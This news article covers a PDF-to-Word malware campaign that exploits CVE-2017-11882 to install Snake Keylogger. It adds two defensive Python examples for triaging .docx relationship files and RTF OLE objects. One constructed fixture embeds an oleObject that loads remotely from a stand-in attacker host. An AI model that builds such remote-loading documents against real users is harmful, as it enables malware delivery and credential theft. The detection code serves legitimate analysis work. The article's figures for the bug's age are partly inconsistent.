The email campaign also relied on Microsoft Word, which it used to exploit a 22-year-old Office RCE flaw.
While most malicious e-mail campaigns use Word documents to disguise and spread malware, researchers have uncovered a recently discovered campaign that combines a malicious PDF file with a 22-year-old Office bug to deliver the Snake Keylogger malware.
According to a blog post published Friday by HP Wolf Security researchers, the campaign tries to fool victims with an attached PDF that purports to contain details of a remittance payment. Instead, it fetches the data-stealing malware, using several layers of deception along the way to avoid detection.
“While Office formats remain popular, this campaign demonstrates how attackers are also exploiting weaponized PDF documents to infect systems,” stated HP Wolf Security researcher Patrick Schlapfer in the report, titled “PDF Malware Is Not Yet Dead.”
Indeed, for the past decade attackers running malicious email campaigns have packaged malware in Microsoft Office file formats, primarily Word and Excel, according to Schlapfer. Nearly half (45%) of the malware HP Wolf Security detected in the first quarter of 2022 used Office formats.
“The reasons are clear: users are familiar with these file types, and the applications used to open them are widespread,” he said.
Researchers found that while the new campaign uses a PDF as the lure, it ultimately relies on Microsoft Word to deliver the final payload, the Snake Keylogger. According to Fortinet, Snake Keylogger is .NET malware that first appeared in late 2020 and is built to harvest sensitive data from a victim's computer, including saved credentials, keystrokes, screenshots and clipboard contents.
On March 23, the HP Wolf Security team discovered a new PDF-based threat campaign with a “unique infection chain” that included “various methods to elude detection, such as inserting malicious files, loading remotely-hosted exploits, and shellcode encryption,” according to Schlapfer.
Attackers send victims an email with a PDF attachment named “REMMITANCE INVOICE.pdf” (misspelling in the original). When the recipient opens the file, Adobe Reader prompts them to open an embedded .docx file with an unusual name.
The attackers chose that name deliberately. It contains the phrase “has been verified” together with the words PDF, Jpeg, xlsx and .docx, so that when Adobe Reader displays its open-file prompt, the file name reads as if it were part of the prompt's own wording and suggests the Word document has already been checked, according to the post.
The .docx is stored as an Embedded File object inside the PDF; clicking it opens Microsoft Word. If Protected View is turned off, Word downloads a Rich Text Format (.rtf) file from a web server and loads it into the open document.
The researchers found the download URL by unzipping the .docx, which, like every Office Open XML file, is a ZIP archive: hidden in its “document.xml.rels” relationships file was a URL pointing to a domain that has no business appearing in an Office document.
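To show what the researchers pulled out of “document.xml.rels”, here is an added example (mine, not HP Wolf Security's tooling) that builds a constructed minimal .docx in memory carrying an external oleObject relationship, then scans every relationships part in the archive for TargetMode="External" entries and flags those whose type makes Word fetch the target when the document opens. It generalises slightly beyond the article: it walks all *.rels parts rather than only document.xml.rels, because remote-template injection places its relationship in settings.xml.rels instead. The file names and the attacker URL (on the reserved .invalid TLD) are placeholders.

```python
"""Triage an Office Open XML (.docx) archive for external relationships.

Added example, not code from HP Wolf Security. The sample document, its
part names and the URL (attacker.invalid) are constructed placeholders.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse
from xml.sax.saxutils import escape

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types whose external target Word resolves at open time.
# A hyperlink is also "External" but is only followed on click, so it is
# deliberately not in this set.
FETCH_ON_OPEN = {"attachedTemplate", "oleObject", "frame", "subDocument", "image"}


def scan_rels(data: bytes) -> list:
    """Return every TargetMode="External" relationship found in any *.rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError as exc:
                # A relationships part that will not parse deserves a look too.
                findings.append({"part": name, "type": "", "target": "", "host": "",
                                 "fetch_on_open": False, "note": f"unparsable rels: {exc}"})
                continue
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]   # e.g. "oleObject"
                target = rel.get("Target", "")
                findings.append({
                    "part": name,
                    "type": rtype,
                    "target": target,
                    "host": (urlparse(target).hostname or "").lower(),
                    "fetch_on_open": rtype in FETCH_ON_OPEN,
                    "note": "",
                })
    return findings


def remote_loads(data: bytes) -> list:
    """External relationships that Word will fetch over http(s) on open."""
    return [f for f in scan_rels(data)
            if f["fetch_on_open"] and f["target"].lower().startswith(("http://", "https://"))]


def build_sample_docx(ole_url: str) -> bytes:
    """Constructed minimal .docx whose document.xml.rels links a remote OLE object."""
    url = escape(ole_url, {'"': "&quot;"})
    rels_root = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                 f'<Relationships xmlns="{RELS_NS}">'
                 f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="word/document.xml"/>'
                 f'</Relationships>')
    rels_doc = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                f'<Relationships xmlns="{RELS_NS}">'
                f'<Relationship Id="rId1" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
                f'<Relationship Id="rId2" Type="{OFFICE_REL}hyperlink" Target="https://example.com/" TargetMode="External"/>'
                f'<Relationship Id="rId3" Type="{OFFICE_REL}oleObject" Target="{url}" TargetMode="External"/>'
                f'</Relationships>')
    document = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                '<w:body><w:p/></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", rels_root)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/_rels/document.xml.rels", rels_doc)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://attacker.invalid/f")
    for hit in remote_loads(sample):
        print(f"{hit['part']}: {hit['type']} -> {hit['target']}")
```

Run against a real attachment by reading the file into `scan_rels`; the hyperlink in the sample is reported as external but not as a load-on-open, while the oleObject entry is, which is the pattern to alert on.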
17-Year-Old Bug Exploited
Connecting to this URL triggers a redirect, after which an RTF document named “f document shp.doc” is downloaded. It contains two “not well-formed” OLE objects carrying shellcode that exploits CVE-2017-11882, which the researchers describe as an “almost four-year-old” remote code execution (RCE) vulnerability in Equation Editor, a Microsoft Office component for inserting and editing complex equations in Word documents through Object Linking and Embedding (OLE) elements.
Microsoft patched the flaw in 2017, more than four years before this campaign, but it had been present for roughly 17 years before that, which is how it comes to be described as 22 years old. This stage of the chain therefore only succeeds on machines that have not applied the 2017 fix; a patched Office install, or one where Equation Editor has since been removed, stops it.
At the end of one of the OLE objects, in its “OLENativeStream” structure, the researchers found the shellcode that completes the attack. That code decrypts a ciphertext into further shellcode, which then executes and produces an executable named fresh.exe that loads the Snake Keylogger.
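As an added example (not from HP's report), the parser below pulls \objdata blobs out of an RTF file and decodes their OLE1 object headers (OLEVersion, FormatID, ClassName, TopicName, ItemName, then NativeDataSize and NativeData for embedded objects), which is where an Equation Editor object's native data, and any shellcode hidden in it, ends up. It covers both the RTF-with-OLE-objects stage and the native-data stage described in the two paragraphs above. The sample RTF is constructed: it holds one well-formed object and one whose declared NativeDataSize exceeds the bytes present, standing in for the “not well-formed” objects the researchers mention. The class name Equation.3 is the ProgID of Equation Editor 3.0, which the article does not itself name; the native data bytes are placeholders, not an exploit.

```python
"""Extract OLE1 embedded objects from RTF \\objdata blobs and parse their headers.

Added example, not HP Wolf Security tooling. The sample RTF is constructed;
its NativeData is placeholder bytes. Layout follows MS-OLEDS ObjectHeader /
EmbeddedObject (OLEVersion, FormatID, three length-prefixed ANSI strings,
then NativeDataSize + NativeData when FormatID == 2).
"""
import re
import struct

OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
OLE_EMBEDDED = 0x00000002  # FormatID for an embedded (not linked) object


def _lp_string(buf: bytes, off: int):
    """Read a LengthPrefixedAnsiString: DWORD length (incl. NUL), then bytes."""
    if off + 4 > len(buf):
        raise ValueError("truncated length prefix")
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    s = buf[off:off + n]
    if len(s) != n:
        raise ValueError("truncated string body")
    return s.rstrip(b"\x00").decode("latin-1"), off + n


def parse_ole1(blob: bytes) -> dict:
    """Parse one OLE1 object; records size mismatches instead of failing."""
    if len(blob) < 8:
        raise ValueError("blob too short for ObjectHeader")
    version, format_id = struct.unpack_from("<II", blob, 0)
    off = 8
    class_name, off = _lp_string(blob, off)
    topic_name, off = _lp_string(blob, off)
    item_name, off = _lp_string(blob, off)
    anomalies, declared, native = [], 0, b""
    if format_id == OLE_EMBEDDED:
        if off + 4 > len(blob):
            raise ValueError("missing NativeDataSize")
        (declared,) = struct.unpack_from("<I", blob, off)
        off += 4
        native = blob[off:off + declared]
        if len(native) < declared:
            anomalies.append(f"NativeData truncated: declared {declared}, present {len(native)}")
        elif len(blob) > off + declared:
            anomalies.append(f"{len(blob) - off - declared} trailing bytes after NativeData")
    return {
        "ole_version": version, "format_id": format_id,
        "class_name": class_name, "topic_name": topic_name, "item_name": item_name,
        "native_size": declared, "native_data": native,
        # Equation Editor objects carry the ProgID "Equation.3" (Equation Editor 3.0).
        "equation_editor": class_name.lower().startswith("equation"),
        "anomalies": anomalies,
    }


def extract_objects(rtf: bytes) -> list:
    """Find every \\objdata run, decode its hex (tolerating line breaks) and parse it."""
    results = []
    for m in OBJDATA_RE.finditer(rtf):
        run = re.sub(rb"\s+", b"", m.group(1))
        anomalies = []
        if len(run) % 2:            # a dangling nibble is another "not well-formed" sign
            anomalies.append("odd-length hex run")
            run = run[:-1]
        blob = bytes.fromhex(run.decode("ascii"))
        try:
            obj = parse_ole1(blob)
        except (ValueError, struct.error) as exc:
            obj = {"class_name": None, "equation_editor": False, "native_data": b"",
                   "native_size": 0, "anomalies": [str(exc)]}
        obj["anomalies"] = anomalies + obj["anomalies"]
        obj["well_formed"] = not obj["anomalies"]
        results.append(obj)
    return results


def _lp(s: bytes) -> bytes:
    return struct.pack("<I", len(s) + 1) + s + b"\x00"


def build_objdata(native: bytes, declared_size=None) -> bytes:
    """Constructed OLE1 EmbeddedObject with ClassName Equation.3 and given NativeData."""
    header = (struct.pack("<II", 0x00000501, OLE_EMBEDDED)
              + _lp(b"Equation.3")        # ClassName
              + struct.pack("<I", 0)      # TopicName: empty
              + struct.pack("<I", 0))     # ItemName: empty
    size = len(native) if declared_size is None else declared_size
    return header + struct.pack("<I", size) + native


def build_sample_rtf() -> bytes:
    """Constructed RTF: one well-formed object, one with an oversized NativeDataSize."""
    def wrap(h):  # RTF writers wrap objdata hex across lines; the parser must cope
        return "\r\n".join(h[i:i + 64] for i in range(0, len(h), 64))
    good = build_objdata(b"\x11\x22\x33\x44").hex()          # placeholder native data
    bad = build_objdata(b"\x11\x22", declared_size=0x1000).hex()
    rtf = (r"{\rtf1\ansi\deff0"
           r"{\object\objemb{\*\objclass Equation.3}{\*\objdata " + wrap(good) + "}}"
           r"{\object\objemb{\*\objclass Equation.3}{\*\objdata " + wrap(bad) + "}}"
           "}")
    return rtf.encode("ascii")


if __name__ == "__main__":
    for i, obj in enumerate(extract_objects(build_sample_rtf())):
        print(i, obj["class_name"], obj["native_size"], obj["well_formed"], obj["anomalies"])
```

On a real sample, feed the downloaded RTF to `extract_objects` and hand each object's `native_data` to a hex dump or disassembler; an Equation Editor class with a size mismatch, or with native data far larger than a genuine equation record, is the point in the chain where the shellcode from the article would sit.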